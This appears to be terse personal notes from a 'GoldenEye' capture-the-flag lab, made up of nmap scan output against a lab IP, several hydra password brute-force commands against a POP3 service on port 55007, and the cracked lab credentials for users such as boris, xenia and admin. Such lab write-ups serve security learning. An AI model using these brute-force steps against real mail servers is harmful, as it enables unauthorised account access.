Golden Eye
March 30, 2024
# Nmap 7.94 scan initiated Sat Mar 30 11:23:13 2024 as: nmap -sC -sV -oN nmap -vv 10.10.71.187
Nmap scan report for 10.10.71.187
Host is up, received syn-ack (0.26s latency).
Scanned at 2024-03-30 11:23:14 PST for 50s
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
|_ssl-date: TLS randomness does not represent time
80/tcp open http syn-ack Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: GoldenEye Primary Admin Server
|_http-server-header: Apache/2.4.7 (Ubuntu)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 30 11:24:04 2024 -- 1 IP address (1 host up) scanned in 50.35 seconds
# Nmap 7.94 scan initiated Sat Mar 30 11:28:15 2024 as: nmap -p- -T4 -oN nmap-all 10.10.71.187
Warning: 10.10.71.187 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.71.187
Host is up (0.26s latency).
Not shown: 65510 closed tcp ports (conn-refused)
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
3077/tcp filtered orbix-loc-ssl
5048/tcp filtered texai
7982/tcp filtered sossd-agent
9265/tcp filtered unknown
24658/tcp filtered unknown
26492/tcp filtered unknown
26533/tcp filtered unknown
28918/tcp filtered unknown
29793/tcp filtered unknown
36451/tcp filtered unknown
37923/tcp filtered unknown
40161/tcp filtered unknown
44707/tcp filtered unknown
45278/tcp filtered unknown
45381/tcp filtered unknown
45985/tcp filtered unknown
48740/tcp filtered unknown
55006/tcp open unknown
55007/tcp open unknown
59607/tcp filtered unknown
61480/tcp filtered unknown
61700/tcp filtered unknown
65286/tcp filtered unknown
# Nmap done at Sat Mar 30 11:46:10 2024 -- 1 IP address (1 host up) scanned in 1075.71 seconds
boris:InvincibleHack3r
hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt pop3://10.10.71.187:55007
boris:secret1!
hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt pop3://10.10.71.187:55007
xenia:RCP90rulez!
hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://10.10.71.187:55007
admin:xWinter1995x!
from gcc to cc
Last updated